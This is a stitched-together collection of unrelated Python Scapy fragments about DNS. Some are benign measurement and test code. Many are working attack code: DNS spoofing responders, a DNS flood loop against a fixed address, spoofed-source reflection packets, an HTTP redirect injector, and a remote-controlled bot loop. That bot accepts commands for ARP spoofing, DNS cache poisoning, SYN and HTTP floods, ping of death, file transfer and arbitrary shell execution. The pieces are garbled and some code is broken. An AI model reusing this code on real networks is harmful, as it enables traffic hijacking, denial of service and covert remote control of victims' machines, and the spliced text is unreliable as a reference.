def dns_request_factory(id_num):
packet = network.DNS(id=random.randrange(0, 65536, 1),
rd=1,
qdcount=1,
qd=network.DNSQR(qname=str(id_num) +
".yumi.ipl.eecs.case.edu"))
return bytes(packet)
def handle_packet(packet):
ip = packet.getlayer(scapy.IP)
udp = packet.getlayer(scapy.UDP)
dns = packet.getlayer(scapy.DNS)
# standard (a record) dns query
if dns.qr == 0 and dns.opcode == 0:
queried_host = dns.qd.qname[:-1]
resolved_ip = None
if dns_map.get(queried_host):
resolved_ip = dns_map.get(queried_host)
elif dns_map.get('*'):
resolved_ip = dns_map.get('*')
if resolved_ip:
dns_answer = scapy.DNSRR(rrname=queried_host + '.',
ttl=330,
type="A",
rclass="IN",
rdata=resolved_ip)
dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \
scapy.UDP(sport=udp.dport,dport=udp.sport) / \
scapy.DNS(
id = dns.id,
qr = 1,
aa = 0,
rcode = 0,
qd = dns.qd,
an = dns_answer
)
print "Send %s has %s to %s" % (queried_host, resolved_ip, ip.src)
scapy.send(dns_reply, iface=dev)
def handle(self) -> None:
try:
# packet_content = network.DNS(self.data.strip())
packet_content = network.DNS(self.request[0].strip())
question_name = packet_content[network.DNSQR].qname.decode()
status_code = _STATUS_CODE.get(packet_content.rcode,
"unknown status")
question_id = question_name.split(".")[0]
response_ip = self.client_address[0]
if status_code == "ok" and packet_content.ancount > 0:
answer = packet_content[network.DNSRR].rdata == CORRECT_ANSWER
statistics = {
"session_id": question_id,
"ip_address": response_ip,
"status": status_code if answer else "answer error",
"response_time": time.time()
}
# if answer:
# self.backend.insert(response_ip)
else:
statistics = {
"session_id": question_id,
"ip_address": response_ip,
"status": status_code,
"response_time": time.time()
}
self.__write_to_database(statistics)
except:
print("Has an Error (IP: {}) but handled".format(
self.client_address[0]))
def read_packet_info(packet:bytes) -> {str:str}:
packet_content = network.DNS(packet)
try:
# packet_content.show()
trans_id = packet_content[network.DNS].id
question = packet_content[network.DNS][network.DNSQR].qname
except IndexError as e:
print(e)
return None
################# Below is for EDNS0 #################
edns_support = packet_content[network.DNS].haslayer(network.DNSRROPT)
edns_bufsize = -1
if edns_support:
edns_bufsize = packet_content[network.DNS][network.DNSRROPT].rclass
return {
"Transaction ID" : trans_id,
"Question" : question,
"Support EDNS0" : edns_support,
"EDNS0 Bufsize" : edns_bufsize
}
def generate(self, ip_dst=None, eth_dst=None):
"""Generates a mDNS v4 packet for multicast DNS config
Args:
ip_dst: IP destination address (Optional)
eth_dst: Ethernet (layer 2) destination address (Optional)
"""
# Overwrite standard fields if desired
sta_ip = (ip_dst if ip_dst is not None else MDNS_V4_IP_DST)
sta_hw = (eth_dst if eth_dst is not None else MDNS_V4_MAC_DST)
# Create mDNS layer
qdServer = scapy.DNSQR(qname=self.src_ipv4, qtype=MDNS_QTYPE)
mDNS = scapy.DNS(rd=MDNS_RECURSIVE, qd=qdServer)
# Create UDP
udp = scapy.UDP(sport=MDNS_UDP_PORT, dport=MDNS_UDP_PORT)
# Create IP layer
ip4 = scapy.IP(src=self.src_ipv4, dst=sta_ip, ttl=255)
# Create Ethernet layer
ethernet = scapy.Ether(src=self.src_mac, dst=sta_hw)
self.packet = ethernet / ip4 / udp / mDNS
return self.packet
def dnspunch(self):
# punchpkt
e = scapy.Ether(dst=self.router_mac)
self.msg("sending punchies...")
pkt = scapy.IP(src=self.server_ip, dst=self.attacker_ip)
pkt /= scapy.UDP(sport=53, dport=53)
pkt /= scapy.Raw("udp holepunch test")
scapy.sendp(e / pkt, iface=self.interface)
# rqpkt
self.msg("sending DNS request to %s asking %s..." %
(self.server_ip, self.domain))
pkt = scapy.IP(src=self.attacker_ip, dst=self.server_ip)
pkt /= scapy.UDP(sport=53, dport=53)
pkt /= scapy.DNS(rd=1, qd=scapy.DNSQR(qname=self.domain))
x, u = scapy.srp(e / pkt, timeout=5, iface=self.interface)
self.msg('ok')
for p in x[0]:
p.show()
if p[1].proto == 1:
print "%s %s/%s" % (p[1].sprintf("%IP.src%"),
p[1].sprintf("%ICMP.type%"),
p[1].sprintf("%ICMP.code%"))
else:
p[1].show()
def check_DNS_response(response: bytes,
ip_address: str,
number_of_entry=100) -> "status":
readable_packet = network.DNS(response)
if readable_packet.ancount != number_of_entry:
return "TCP wrong number of records ({} entries)".format(
readable_packet.ancount)
else:
answers = [
readable_packet.an[index].rdata for index in range(number_of_entry)
]
names = [
readable_packet.an[index].rrname.decode()
for index in range(number_of_entry)
]
if answers != [
"192.168.0.{}".format(num) for num in range(number_of_entry)
]:
return "TCP wrong answer values"
request_id = hex(ip_2_int(ip_address))
correct_name = "jumbo-" + request_id + QUESTION_ZONE
if set(names) != {
correct_name + ".",
}:
return "TCP wrong name entries"
return "TCP answer OK"
def handle_packet(packet):
ip = packet.getlayer(scapy.IP)
udp = packet.getlayer(scapy.UDP)
# Ignore packets containing data we aren't interested
# in.
if hasattr(packet, 'qd') and packet.qd is not None:
queried_host = packet.qd.qname[:-1].decode("utf-8")
if queried_host is None:
print("queried_host is None, dropping request")
return
# If the queried_host is one of the domains we want
# to spoof, return the spoof_ip.
if queried_host in spoof_domains:
print("!!!! Spoofing DNS request for %s by %s !!!!"
% (queried_host, ip.src))
resolved_ip = spoof_ip
# Else use dns.resolver to make a real DNS "A record"
# request, and return the result of that.
else:
print("Forwarding DNS request for %s by %s" %
(queried_host, ip.src))
a_records = dns.resolver.query(queried_host, 'A')
resolved_ip = a_records[0].address
# Build the DNS answer
dns_answer = scapy.DNSRR(
rrname=queried_host + ".",
ttl=330,
type="A",
rclass="IN",
rdata=resolved_ip)
# Build the DNS response by constructing the IP
# packet, the UDP "datagram" that goes inside the
# packet, and finally the DNS response that goes
# inside the datagram.
dns_response = \
scapy.IP(src=ip.dst, dst=ip.src) / \
scapy.UDP(
sport=udp.dport,
dport=udp.sport
) / \
scapy.DNS(
id = packet[scapy.DNS].id,
qr = 1,
aa = 0,
rcode = 0,
qd = packet.qd,
an = dns_answer
)
print("Resolved DNS request for %s to %s for %s" %
(queried_host, resolved_ip, ip.src))
# Use scapy to send our response back to your phone.
scapy.send(dns_response, iface=iface)
else:
print("Ignoring unrecognized packet from %s" % ip.src)
def make_response(transaction_id:str, question_name:bytes, size=3, cname=False) -> network.DNS:
if question_name == b"yumi.ipl.eecs.case.edu.":
return network.DNS(
id=transaction_id,
qr=1,
aa=1,
ra=1,
qdcount=1,
qd=network.DNSQR(qname=question_name),
ancount=1,
an=network.DNSRR(
rrname=question_name,
rdata="129.22.150.112"
)
)
if cname:
return network.DNS(
id=transaction_id,
qr=1,
aa=1,
ra=1,
qdcount=1,
qd=network.DNSQR(qname=question_name),
ancount=1,
an=network.DNSRR(
rrname=question_name,
type=5, #CNAME
rdata="cname-"+question_name.decode()
)
)
records = ["192.168.0.{}".format(num) for num in range(size)]
base_record = network.DNSRR(rrname=question_name, ttl=600, rdata=records[0])
for resource_records in records[1:]:
base_record /= network.DNSRR(rrname=question_name, ttl=600, rdata=resource_records)
return network.DNS(
id=transaction_id,
qr=1,
aa=1,
ra=1,
qdcount=1,
qd=network.DNSQR(qname=question_name),
ancount=len(records),
an=base_record
)
def correct_packet(source_port, identification):
UDP_header = network.UDP(sport=53, dport=source_port)
raw_packet = network.DNS(id=identification,
ancount=1,
an=network.DNSRR(
rrname="one.yumi.ipl.eecs.case.edu",
rdata="129.22.150.112"))
return UDP_header / raw_packet
def setUp(self):
"""
Setup class for DNS_Amplification.
"""
# Create scapy packet (valid attack)
self.pkt = scapy.IP(src="10.0.2.15",
dst="dns.google") \
/ scapy.UDP(dport=53) \
/ scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY"))
# Create a scapy packet (invalid attack)
self.pkt2 = scapy.IP(src="10.0.2.15",
dst="0.0.0.0") \
/ scapy.UDP(dport=53) \
/ scapy.DNS(rd=1, qd=scapy.DNSQR(qname="google.com", qtype="ANY"))
# Create DNS Amplification object
self.dns_amp_obj = DNS_Amplification()
def handle_packet(self, packet): if self.stop != '': print 'stopping' exit() ip = packet.getlayer(scapy.IP) # if ip.src !='': # if ip.src != self.victim_ip: # return 0 udp = packet.getlayer(scapy.UDP) dhcp = packet.getlayer(scapy.DHCP) dns=packet.getlayer(scapy.DNS) # #take no action when the paket doesnt come from target victim # print str(self.victim_ip).strip() + " and ===> "+ str(ip.src).strip() if self.victim_ip != '': if str(self.victim_ip).strip() != str(ip.src).strip(): return 0 # print 'dns qr '+ str(dns.qr) +' and opcode is ' + str (dns.opcode) # print dns if dns.qr == 0 and dns.opcode == 0: queried_host = dns.qd.qname[:-1] resolved_ip = None if self.address_to_spoof !='': if str(queried_host).strip() != str(self.address_to_spoof).strip(): #print 'The queried host is not our target i.e. '+ str(queried_host).strip()+"and ===> "+ str(self.address_to_spoof).strip() return 0 resolved_ip=self.fake_ip print "about to spoof queried host"+str(queried_host)+ " from source ip "+ str(ip.src) if resolved_ip: #print "=======>"+str(resolved_ip) dns_answer = scapy.DNSRR(rrname=queried_host + ".", ttl=330, type="A", rclass="IN", rdata=resolved_ip) dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \ scapy.UDP(sport=udp.dport, dport=udp.sport) / \ scapy.DNS( id = dns.id, qr = 1, aa = 0, rcode = 0, qd = dns.qd, an = dns_answer ) #print dns_reply print "\n\n fooled comp with ip %s that server %s has ip address %s \n\n" % (ip.src, queried_host, resolved_ip) scapy.send(dns_reply, iface=self.dev)
def traceroute_dns_servers(hosts, fqdn):
"""
Run UDP traceroutes to the given DNS servers, using FQDN in DNS requests.
"""
log.info("Running UDP traceroutes to %d servers." % len(hosts))
addrs = [host.addr for host in hosts]
udp_datagram = scapy.UDP(sport=scapy.RandShort())
dns_msg = scapy.DNS(qd=scapy.DNSQR(qname=fqdn))
return scapy.traceroute(addrs, l4=udp_datagram / dns_msg, verbose=0)
def redirect_process(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.DNSRR):
qname = scapy_packet[scapy.DNSQR].qname
answer = scapy.DNS(rrname=qname, rdata="192.168.1.10")
scapy_packet[scapy.DNS].an = answer
scapy_packet[scapy.DNS].ancount = 1
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.UDP].chksum
del scapy_packet[scapy.UDP].len
packet.set_paylaod(str(scapy_packet))
packet.accept()
def create_dns_response(dns_qid, qdsec, ansec, nssec, ip, udp):
dns = scapy.DNS(id=dns_qid,
qr=1,
aa=1,
rcode=0,
qdcount=1,
ancount=1,
nscount=1,
arcount=0,
qd=qdsec,
an=ansec,
ns=nssec,
ar=None)
response = scapy.raw(ip / udp / dns)
return response
def handle(packet): global hostfile_dict # Only deal with packets containing DNS records if packet.haslayer(scapy.DNS): # Dissect packet into approriate layers orig_ip = packet.getlayer(scapy.IP) orig_udp = packet.getlayer(scapy.UDP) orig_dns = packet.getlayer(scapy.DNS) # If -h option provided if hostfile_dict: # Check if queried domain part of hostfile if (packet.getlayer(scapy.DNS).qd.qname) not in hostfile_dict.keys(): return spoofed_rdata = hostfile_dict[orig_dns.qd.qname] else: # Spoofed IP of local machine ni.ifaddresses(dev) spoofed_rdata = ni.ifaddresses(dev)[ni.AF_INET][0]['addr'] #qr = 0 for Query and qtype = 1 for A record if orig_dns.qr == 0 and orig_dns.qd.qtype == 1: spoofed_src_ip = orig_ip.dst spoofed_dst_ip = orig_ip.src spoofed_src_port = orig_udp.dport spoofed_dst_port = orig_udp.sport spoofed_id = orig_dns.id spoofed_qr = 1 spoofed_opcode = orig_dns.opcode spoofed_aa = 1 spoofed_rd = orig_dns.rd spoofed_ra = 0 spoofed_z = 0 spoofed_rcode = 0 spoofed_qdcount = 1 spoofed_ancount = 1 spoofed_question = scapy.DNSQR(qname = orig_dns.qd.qname, qtype = orig_dns.qd.qtype, qclass = orig_dns.qd.qclass) spoofed_answer = scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) # To return multiple IPs #/scapy.DNSRR(rrname = orig_dns.qd.qname, type = orig_dns.qd.qtype, rclass = orig_dns.qd.qclass, ttl = 40960, rdata = spoofed_rdata) spoofed_IP = scapy.IP(src = spoofed_src_ip, dst = spoofed_dst_ip) spoofed_UDP = scapy.UDP(sport = spoofed_src_port, dport = spoofed_dst_port) spoofed_DNS = scapy.DNS(id = spoofed_id, qr = 1, opcode = spoofed_opcode, aa = 1, rd = spoofed_rd, ra = 0, z = 0, rcode = 0, qdcount = spoofed_qdcount, ancount = spoofed_ancount, qd = spoofed_question, an = spoofed_answer) # Sendp sends from layer 2 scapy.sendp(scapy.Ether()/spoofed_IP/spoofed_UDP/spoofed_DNS, iface = dev )
def handle_packet(packet):
ip = packet.getlayer(scapy.IP)
udp = packet.getlayer(scapy.UDP)
dhcp = packet.getlayer(scapy.DHCP)
dns = packet.getlayer(scapy.DNS)
#print decoder.decode(packet)
# standard (a record) dns query
print dns.qr
if dns.qr == 0 and dns.opcode == 0:
queried_host = dns.qd.qname[:-1]
resolved_ip = None
print "queried host is " + str(
queried_host) + "and ip source is " + str(
ip.src) + "Destination is " + str(ip.dst)
if dns_map.get(queried_host):
resolved_ip = dns_map.get(queried_host)
print "=======>" + str(resolved_ip)
elif dns_map.get('*'):
resolved_ip = dns_map.get('*')
print "l=======>" + str(resolved_ip)
if resolved_ip:
print "=======>" + str(resolved_ip)
dns_answer = scapy.DNSRR(rrname=queried_host + ".",
ttl=330,
type="A",
rclass="IN",
rdata=resolved_ip)
dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \
scapy.UDP(sport=udp.dport,
dport=udp.sport) / \
scapy.DNS(
id = dns.id,
qr = 1,
aa = 0,
rcode = 0,
qd = dns.qd,
an = dns_answer
)
print "Send %s has %s to %s" % (queried_host, resolved_ip, ip.src)
scapy.send(dns_reply, iface=dev)
def DNS_Flood():
clear = os.system('clear')
#s = scapy.RandString(scapy.RandNum(1,10))
#s1 ='www'
#print(s1)
#a = scapy.RandNum(1,10)
#print(a)
#s2 = scapy.RandString(scapy.RandNum(1,5))
#s2 = s2.lower()
#s2 = str(s2)
#s2 = s2[2:-1]
#print(s2)
#process_id =process_id
#s3 = 'com'
#s = s1+'.'+s2+'.'+s3
#print("Please input target's IP:")
#target = input("[DNS_Flood]#")
#target = "172.16.4.80"
#src_ip = scapy.RandIP()
#print(s)
num = 0
try:
while True:
packet = scapy.IP(dst="172.16.4.80") / scapy.UDP(
sport=scapy.RandShort(), dport=53) / scapy.DNS(
rd=1, qd=scapy.DNSQR(qname="www.flood.com"))
#packets = scapy.IP(src=src_ip,dst=target)/scapy.UDP(sport=scapy.RandShort(),dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.flood.com"))
#packet =scapy.IP(src=src_ip,dst=target)/scapy.TCP(dport=80,flags="S")
#scapy.srflood(packet)
scapy.send(packet, count=2000, verbose=False)
#scapy.send(packets,verbose=False)
num += 1
#if num == 1000:
#print("%s,%s"%(name,num))
print(num)
except KeyboardInterrupt:
print("[-] Ctrl + C detected.....")
def pressure_task(self, serial_num):
time_consumed = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while time_consumed < self.__time:
packet = dns_request_factory(serial_num)
sock.sendto(packet, ("localhost", 53))
start_time = time.time()
response, (sip, sport) = sock.recvfrom(600)
if sip == "127.0.0.1" and sport == 53:
try:
parsed_response = network.DNS(response)
if parsed_response[network.DNSRR].rrname.decode(
).split(".")[0] == str(serial_num):
self.__time_statistic.append(time.time() -
start_time)
except:
self.__failed += 1
sleep_time = numpy.random.ranf()
time.sleep(sleep_time)
time_consumed += sleep_time
def handle_packet(packet):
ip = packet.getlayer(scapy.IP)
udp = packet.getlayer(scapy.UDP)
dns = packet.getlayer(scapy.DNS)
#DNS query
if dns.qr == 0 and dns.opcode == 0:
queried_host = dns.qd.qname[:-1]
resolved_ip = None
if dns_map.get(queried_host):
resolved_ip = dns_map.get(queried_host)
#No matter what's the host
elif dns_map.get('*'):
resolved_ip = dns_map.get('*')
if resolved_ip:
dns_answer = scapy.DNSRR(rrname=queried_host + ".",
ttl=330,
type="A",
rclass="IN",
rdata=resolved_ip)
dns_reply = scapy.IP(src=ip.dst,dst=ip.src) /\
scapy.UDP(sport=udp.dport,
dport=udp.sport)/ \
scapy.DNS(
id= dns.id,
qr=1,
aa=0,
rcode = 0,
qd=dns.qd,
an=dns_answer
)
#if the destination is iface's ip function "send" will not work
scapy.send(dns_reply, iface=dev)
scapy.sniff(prn=result, iface=dev, filter=filter)
dns_ip = input("Insert IP: ")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((my_ip, my_port))
rawsock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
rawsock.setsockopt(socket.IPPROTO_IP, socket.SO_REUSEADDR, 1)
ip = scapy.IP(src=my_ip, dst=dns_ip)
qdsec = scapy.DNSQR(qname=my_domain, qtype="A", qclass="IN")
dns = scapy.DNS(qr=0,
opcode="QUERY",
rd=1,
qdcount=1,
ancount=0,
nscount=0,
arcount=0,
qd=qdsec)
p = multiprocessing.Pool(8)
print("Sending requests...")
open_dns_ports = p.map(scan_dns, list(range(1, 65535 + 1)))
p.close()
p.join()
open_dns_ports = [port for port in open_dns_ports if port is not None]
print("Open Ports: {}".format(str(open_dns_ports).replace(' ', '')))
sock.close()
rawsock.close()
elif command == 'killarp':
def pkt(self):
return scapy.IP(dst=self.dst) / scapy.UDP(
sport=self.sport) / scapy.DNS(rd=1,
qd=scapy.DNSQR(qname=self.qname))
def pkt_callback(pkt):
if pkt.haslayer(scapy.Dot11):
#print("got Wifi packet")
# construct fake l2 for wifi packet
macl = pkt.getlayer(scapy.Dot11)
l2 = scapy.RadioTap() / scapy.Dot11(
addr1=macl.addr2,
addr2=macl.addr1,
addr3=macl.addr3,
FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
elif pkt.haslayer(scapy.Ether):
#print("got Ethernet packet")
# construct fake l2 for ethernet packet
macl = pkt.getlayer(scapy.Ether)
l2 = scapy.Ether(dst=macl.src, src=macl.dst)
else:
print("protocol neither ethernet nor wifi, skipping")
return
if pkt.haslayer(scapy.IP):
# construct fake l3
ipl = pkt.getlayer(scapy.IP)
l3 = scapy.IP(src=ipl.dst, dst=ipl.src)
else:
#print("this is not IP packet, skipping")
return
if pkt.haslayer(scapy.TCP):
#print("we have TCP packet")
# construct fake layer 4 for TCP
tcpl = pkt.getlayer(scapy.TCP)
l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport)
if tcpl.flags == 2: # syn
return
elif tcpl.flags == 24 or tcpl.flags == 16: # psh ack
if pkt.haslayer(scapy.Raw):
#print("packet has some data")
tcpdata = pkt.getlayer(scapy.Raw).load
if tcpdata.startswith("GET "):
#print("TCP data starts with GET")
dsturl = helper.getdsturl(tcpdata)
if dsturl is None:
return
print("IP: %s, DST URL: %s" %
(pkt.getlayer(scapy.IP).src, dsturl))
if dsturl.find('0x0a') != -1 or dsturl.find(
'85.17') != -1 or dsturl.find(
'twitter') != -1 or dsturl.find(
'facebook') != -1 or dsturl.find(
'vk.com') != -1 or dsturl.find(
'blogger') != -1 or dsturl.find(
'odnoklassniki') != -1:
print "inject success"
return
#credirpkt = redirpkt % {'url': "http://0x0a.net/" }
credirpkt = redirpkt
# construct reply packet
pktreply = l2 / l3 / l4
pktreply.getlayer(scapy.TCP).seq = tcpl.ack
pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
pktreply.getlayer(scapy.TCP).flags = "PA"
# construct fin packet
finpktreply = pktreply.copy()
finpktreply.getlayer(scapy.TCP).flags = "FA"
finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)
# add redir payload to reply packet
pktreply.getlayer(scapy.TCP).add_payload(credirpkt)
packetbasket = [pktreply, finpktreply]
# send reply packet
scapy.sendp(packetbasket, verbose=0, iface=interface)
print("Reply sent")
return
elif tcpl.flags == 17: # fin ack
return
elif pkt.haslayer(scapy.UDP):
# construct layer 4 for UDP
udpl = pkt.getlayer(scapy.UDP)
l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)
if pkt.haslayer(scapy.DNS):
#print("We got DNS packet")
dnsl = pkt.getlayer(scapy.DNS)
if dnsl.qr == 0:
print("We got DNS request packet: %s" % (dnsl.qd.qname))
pktreply = l2 / l3 / l4 / scapy.DNS(
id=dnsl.id,
qr=1,
qd=dnsl.qd,
an=scapy.DNSRR(
rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121"))
scapy.sendp([pktreply], verbose=0, iface=interface)
print("Reply sent")
return
else:
print("protocol not TCP or UDP, skipping")
#pkt.show()
return
import argparse
import scapy.all as scapy
parser = argparse.ArgumentParser(description='MIE-SIB second homework. Use Scapy to send a TCP/SYN packet with a spoofed sender IP address and a DNS query with a spoofed sender IP address. The scrit only work\'s in a class C network (/24)')
parser.add_argument('target', help='The IP address of the target')
parser.add_argument('dns_server', help='The IP address of the DNS server')
args = parser.parse_args()
#Send UDP packet
scapy.send(scapy.IP(src=args.target, dst=args.dns_server)/scapy.UDP(dport=53)/scapy.DNS(rd=1,qd=scapy.DNSQR(qname="www.thepacketgeek.com")),verbose=0)
#Send TCP packet
scapy.send(scapy.IP(src=scapy.Rand(args.target +"/24"), dst=args.target)/scapy.TCP(dport=3333, sport=4444, seq=12, flags="S"))
def make_DNS_request(ip_address: str) -> network.DNS:
request_id = hex(ip_2_int(ip_address))
question_name = "jumbo-" + request_id + QUESTION_ZONE
return network.DNS(rd=1, qdcount=1, qd=network.DNSQR(qname=question_name))
def run(self):
while True:
while not self.connected.value:
self.reconnect()
while True:
try:
command = self.reliable_receive()
if command[0] == "arpspoof":
try:
kill_arp()
except:
pass
try:
scan_result = network_scanner()
if scan_result:
global selected
global arp_process
selected = scan_result
arp_process = multiprocessing.Process(
target=arp_spoof,
args=(selected, router_ip))
arp_process.start()
except:
pass
elif command[0] == 'dnsspoof':
try:
kill_dns()
except:
pass
try:
if arp_process and arp_process.is_alive():
try:
kill_hook()
except:
pass
target_website = command[1]
modified_ip = command[2]
global dns_process
dns_process = multiprocessing.Process(
target=dns_spoof,
args=(target_website, modified_ip))
dns_process.start()
except:
pass
elif command[0] == 'hook':
try:
kill_hook()
except:
pass
try:
if arp_process and arp_process.is_alive():
try:
kill_dns()
except:
pass
global hook_process
hook_process = multiprocessing.Process(
target=hook)
hook_process.start()
except NameError:
pass
elif command[0] == "synflood":
try:
flood_ip = command[1]
flood_ports = list(
map(
int, command[2].translate(
{ord(i): None
for i in '[]'}).split(',')))
flood_time = int(command[3])
pool = multiprocessing.Pool(
processes=len(flood_ports))
pool.map(
partial(syn_flooding,
flood_ip=flood_ip,
flood_time=flood_time), flood_ports)
pool.close()
pool.join()
except:
pass
elif command[0] == "httpflood":
try:
flood_ip = command[1]
flood_time = int(command[2])
http_flooding(flood_ip, flood_time)
except:
pass
elif command[0] == "pod":
try:
flood_ip = command[1]
flood_time = int(command[2])
ping_of_death(flood_ip, flood_time)
except:
pass
elif command[0] == "dnscachepoison":
try:
spoofDomain = command[1]
ns = command[2]
nsAddr = command[3]
dnsAddr = command[4]
query = command[5]
dnsPorts = list(
map(
int, command[6].translate(
{ord(i): None
for i in '[]'}).split(',')))
start = int(command[7])
end = int(command[8])
if end > 65535:
end = 65535
dnsQids = list(range(start, end + 1))
badAddr = "10.0.2.10"
ip = scapy.IP(src=nsAddr, dst=dnsAddr)
qdsec = scapy.DNSQR(qname=query,
qtype="A",
qclass="IN")
ansec = scapy.DNSRR(rrname=ns,
type="A",
rclass="IN",
ttl=60000,
rdata=badAddr)
nssec = scapy.DNSRR(rrname=spoofDomain,
type="NS",
rclass="IN",
ttl=60000,
rdata=ns)
p_processes = []
manager = multiprocessing.Manager()
total_responses = manager.list()
for port in dnsPorts:
p = multiprocessing.Process(
target=fake_dns_responses,
args=(port, dnsQids, qdsec, ansec, nssec,
ip, total_responses))
p.start()
p_processes.append(p)
for process in p_processes:
process.join()
rawsock = socket.socket(socket.AF_INET,
socket.SOCK_RAW,
socket.IPPROTO_RAW)
rawsock.setsockopt(socket.IPPROTO_IP,
socket.SO_REUSEADDR, 1)
ip = scapy.IP(src=randomize_ip(), dst=dnsAddr)
qdsec = scapy.DNSQR(qname=query,
qtype="A",
qclass="IN")
dns = scapy.DNS(id=randomize_integer(),
qr=0,
opcode="QUERY",
rd=1,
qdcount=1,
ancount=0,
nscount=0,
arcount=0,
qd=qdsec)
sending_requests = multiprocessing.Process(
target=send_dns_requests,
args=(dnsPorts, ip, dns, dnsAddr, rawsock))
sending_fake_responses_processes = []
for port_responses in total_responses:
port = port_responses[0]
p = multiprocessing.Process(
target=send_dns_responses_pool,
args=(port, port_responses[1], dnsAddr,
rawsock))
sending_fake_responses_processes.append(p)
sending_requests.start()
for process in sending_fake_responses_processes:
process.start()
sending_requests.join()
for process in sending_fake_responses_processes:
process.join()
except:
pass
elif command[0] == "killarp":
try:
kill_arp()
except:
pass
elif command[0] == "killdns":
try:
kill_dns()
except:
pass
elif command[0] == "killhook":
try:
kill_hook()
except:
pass
else:
try:
if command[0] == "exit":
pass
elif command[0] == "killconnection":
self.connected.value = False
break
elif command[0] == "PING":
command_result = "PONG"
elif command[0] == "cd" and len(command) > 1:
command_result = change_working_directory_to(
command[1])
elif command[0] == "download":
command_result = read_file(command[1])
elif command[0] == "upload":
command_result = write_file(
command[1], command[2])
else:
command_result = execute_system_command(
command)
except:
command_result = "[-] Error during command execution."
self.reliable_send(command_result)
except OSError:
self.connected.value = False
break
IPV4_PING = "\x08\x00\x00\x00\x0a\xce\x00\x03"
IPV6_PING = "\x80\x00\x00\x00\x0a\xce\x00\x03"
IPV4_ADDR = "8.8.8.8"
IPV6_ADDR = "2001:4860:4860::8888"
IPV6_SEQ_DGRAM_HEADER = (" sl "
"local_address "
"remote_address "
"st tx_queue rx_queue tr tm->when retrnsmt"
" uid timeout inode ref pointer drops\n")
# Arbitrary packet payload.
UDP_PAYLOAD = str(scapy.DNS(rd=1,
id=random.randint(0, 65535),
qd=scapy.DNSQR(qname="wWW.GoOGle.CoM",
qtype="AAAA")))
# Unix group to use if we want to open sockets as non-root.
AID_INET = 3003
def LinuxVersion():
# Example: "3.4.67-00753-gb7a556f".
# Get the part before the dash.
version = os.uname()[2].split("-")[0]
# Convert it into a tuple such as (3, 4, 67). That allows comparing versions
# using < and >, since tuples are compared lexicographically.
version = tuple(int(i) for i in version.split("."))
return version
dns_answer = scapy.DNSRR(
rrname=queried_host + ".",
ttl=330,
type="A",
rclass="IN",
rdata=resolved_ip)
# Build the DNS response by constructing the IP
# packet, the UDP "datagram" that goes inside the
# packet, and finally the DNS response that goes
# inside the datagram.
dns_response = \
scapy.IP(src=ip.dst, dst=ip.src) / \
scapy.UDP(
sport=udp.dport,
dport=udp.sport
) / \
scapy.DNS(
id = packet[scapy.DNS].id,
qr = 1,
aa = 0,
rcode = 0,
# qd = packet.qd,
qd = 8090,
an = dns_answer
)
print("Resolved DNS request for %s to %s for %s" %
(queried_host, resolved_ip, ip.src))
# Use scapy to send our response back to your phone.
scapy.send(dns_response, iface=iface)
